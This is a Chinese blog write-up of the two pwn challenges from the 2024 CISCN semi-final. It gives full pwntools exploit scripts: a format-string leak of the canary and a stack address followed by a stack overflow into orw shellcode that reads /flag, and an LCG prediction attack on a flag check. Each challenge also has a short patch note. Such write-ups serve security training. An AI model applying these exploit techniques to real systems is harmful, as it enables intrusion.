2024全国大学生信息安全竞赛(ciscn)半决赛(华东北赛区)Pwn题解

已于 2024-06-28 15:30:13 修改
阅读量410 收藏 4
点赞数 2
分类专栏: pwn 文章标签: 网络安全 二进制安全 信息安全 ctf ciscn
于 2024-06-25 17:02:24 首次发布
--simon
本文链接:https://blog.csdn.net/qq_38177830/article/details/139963689
版权

pwn1

  • break

很简单,栈可执行。
先格式化字符串泄露出栈地址和canary,然后稍稍布置一下打orw就行
沙盒和没有一样

from pwn import *

context(arch='amd64', os='linux')

if __name__ == '__main__':
    # io = remote('192.47.1.39', 80)
    io = remote('192.168.142.137', 1234)
    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.recvuntil(b'->set name')
    io.sendline(b'%17$p')

    io.recvuntil(b'2: get name')
    io.sendline(b'2')
    io.recvuntil(b'->get name\n')
    canary = int(io.recvuntil(b'\n')[:-1], 16)

    print(hex(canary))

    shellcode = shellcraft.openat(0, '/flag')
    shellcode += shellcraft.read('rax', 'rsp', 32)
    shellcode += shellcraft.write(1, 'rsp', 32)
    shellcode = asm(shellcode)

    payload = shellcode
    payload = payload.rjust(0x60 - 8 * 3, b'\x90')
    payload += p64(canary)

    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.recvuntil(b'->set name')
    io.sendline(b'%18$pk')

    io.recvuntil(b'2: get name')
    io.sendline(b'2')
    io.recvuntil(b'->get name\n')
    target_stack = int(io.recvuntil(b'k')[:-1], 16) - 0x60

    print(hex(target_stack))

    payload += p64(0xdeedbeef)
    payload += p64(target_stack)

    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.recvuntil(b'->set name')
    io.sendline(payload)

    io.recvuntil(b'2: get name')
    io.sendline(b'3')

    # 7FFD0D2025F0 tar
    # 7FFD0D202650 get
    print(payload)
    print(len(payload))

    io.interactive()
    pass

# context(log_level='debug', arch='amd64', os='linux')
# if __name__ == '__main__':
#     io = remote('202.0.5.74', 8888)
#     shellcode = shellcraft.open('/flag')
#     shellcode += shellcraft.read('rax', 'rsp', 100)
#     shellcode += shellcraft.write(1, 'rsp', 100)
#     shellcode = asm(shellcode)
#     io.sendlineafter(b'ode?\n\n', shellcode)
#     io.interactive()
  • fix

关键点是栈溢出,把read大小从0x80改成0x60即可

pwn2

  • break

简单题,难在没有符号表。
只需要看懂逻辑即可。猜flag头稍稍需要一点点运气

from pwn import *

context(arch='amd64', os='linux')

if __name__ == '__main__':
    # io = remote('192.47.1.50', 80)
    io = remote('192.168.142.137', 9999)

    fuck = []
    for i in range(4):
        io.recvuntil(b'check flag\n')
        io.sendline(b'2')
        io.recvuntil(b':')
        fuck.append(str(int(io.recvuntil(b'\n')[:-1], 10)).encode())
    print(fuck)

    fuck_flag = 0x5139397b67616c66

    for i in range(4):
        fuck_flag = (0x5851F42D4C957F2D * fuck_flag + 12345) & 0x7FFFFFFFFFFFFFFF
        io.recvuntil(b'check flag\n')
        io.sendline(b'3')
        io.recvuntil(b'\n')
        io.sendline(fuck[i] + b' ' + str(fuck_flag).encode())

    io.recvuntil(b'check flag\n')
    io.sendline(b'6')

    io.interactive()

结果

  • fix

把printf吐flag的%s改成ss即可

小结

pwn题目难度整体偏低,而且只有两道题,希望下次可以多一点。

有头发的琦玉
关注
专栏目录
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
2024全国大学生信息安全竞赛ciscn半决赛东北赛区Pwn题解
返璞归真的博客
06-14 1091
2024全国大学生信息安全竞赛ciscn半决赛东北赛区Pwn题解
CISCN2022】东北赛区pwn
weixin_51055545的博客
06-20 429
题目附件大家自取例行检查:amd架构的保护机制全开,放到ida分析;ida分析:首先是开了一个沙箱:这里我用的我的ubuntu16检测的,因为我的21没安装这个工具:然后就是一个菜单:功能齐全;漏洞点在del函数中,释放堆块后未将链表中的指针清空,存在uaf漏洞;漏洞利用:uaf泄露出地址,可以算出environ环境变量在libc中的地址,根据environ环境变量的特性(指向一个栈地址),从而得到栈地址,算出具体偏移,得到ret地址,在通过uaf将堆块申请到返回地址上,写orw读出flagexp: 拿到f
[CISCN2019 东北赛区 Day2 Web3]Point System CBC字节翻转攻击
a3320315的博客
02-05 1131
0x01 题目简介 打开是一个登录界面, 访问robots.txt, 发现一个html, 里面是很多api 然后使用postman注册一下 提示注册成功, 但是缺无法登录~~ 提示权限不足~~ 我们看了一下请求 向login发请求后返回的是 {"code":100,"data":{"token":"eyJzaWduZWRfa2V5IjoiU1VONGExTnBibWRFWVc1alpWSmhVSH...
2020 ciscn 东北分区赛 re题解
Air_cat的博客
09-19 451
唉,居然没师傅出re题,悲伤 此题考点在于抓取或解密出迷宫,这里我用的原函数进行生成,改改几个定义就可以输出迷宫了: #include<stdio.h> #include<string.h> #include<windows.h> #include<string.h> #include<tchar.h> #include<stdint.h > //#+OXJ xnB1 QWT4 9cnW cGFB ZOjn yfZo ZV1m 7+/
2024 CISCN 东北分区赛-Ahisec
最新发布
weixin_45906533的博客
06-24 1147
Ahisec战队。
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"Double ciscn 2019 第十二届全国大学生信息安全竞赛"揭示了这是一个信息安全领域的竞赛,特别是针对大学生的。"全国大学生信息安全竞赛"是中国一项具有高影响力的年度赛事,旨在提升大学生信息安全技能,...
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
北大图灵班本科生获STOC最佳论文奖!这个对标清姚班的人才计划,正在频频交出答卷...
量子位
06-25 1983
乾明 鱼羊发自 凹非寺量子位 报道 | 公众号 QbitAIACM计算理论年会(STOC)正在线上举办中。最新消息,一位江苏常州的小哥哥一口气中了2篇论文,还拿下了最佳论文奖。而且他还...
ciscn 2022 东北分区赛pwn blue
z1r0的博客
07-02 843
开了沙盒 最简单的解法还是借助environ来控制ret地址,然后将ret改成orw链即可。这一题的关键点在于怎么泄露出environ里面的栈地址,因为show功能只能使用一次。 这一题的漏洞点是一次性的uaf漏洞,在666功能下 我们首先先借助这一次性的uaf泄露出libc。还是填满tcache,只不过下一个进unsorted bin的时候利用666这个uaf功能。 接下来思考一下如何泄露出environ里面的值,show是一次性的已经用不了。仔细思考一下不难想出利用stdout来泄露,将flags
CISCN分区赛东北部分wp
Htt9999的博客
06-27 796
东北分区赛部分wp
2022CISCN东北复现
XINO
08-04 809
stegsolve查看发现lsb隐写,红蓝绿通道有加密字符串,这里用seteg一把梭应该也可以感觉像base64,解码pi ka chu解码。
[CISCN2019 东北赛区]Web2
fmyyy1的博客
05-17 733
这次ciscn差点爆0了。。。 还是多练练吧。 注册账号登录,看到投稿和反馈两个页面。 发表查看 直接将我们输入的文章内容显示在了页面上,猜测存在xss。 测试 没有内容也没有弹窗 看源码 我们的语句被放入了源码,但似乎被编码了。导致没有执行。 这个反馈界面应该是模拟管理员点击链接的过程。 ...
2022 ciscn 东北赛区分区赛 部分 wp
qq_23321269的博客
06-19 8686
2022 ciscn 东北分区赛 部分wp
BUUCTF:[CISCN2019 东北赛区]Web2
末初的CSDN博客
03-31 2723
BUUCTF:[CISCN2019 东北赛区]Web2 参考:https://blog.csdn.net/weixin_44677409/article/details/100741998 经测试发现存在以下页面: index.php admin.php login.php register.php post.php commitbug.php about.php admin.php没有权限...
ciscn2021东北赛区分区赛
kingdring的博客
06-15 665
ciscn2021东北赛区分区赛 ++Spirit k1ling 感谢Dazz1e大佬陪我看了很久hh summary 3720pt,rank11 晋级名单还没出,不过大概率是前10进,正好卡掉了,就差一步到罗马,真的意难平… 但是想想自己菜成这样全靠gs带也就释然了一些 这东西就跟S赛一样,今年没了你就要咽下所有的不甘,然后更加努力,等着明年杀回来 ++Spirit绝不会止步于此 今年进第二轮之后改了个名,k某人想去ciscn决赛,去决赛之前不改名,不管哪年,flag立这了。 misc 签到 工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

有头发的琦玉

打点钱,我会再努力的

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值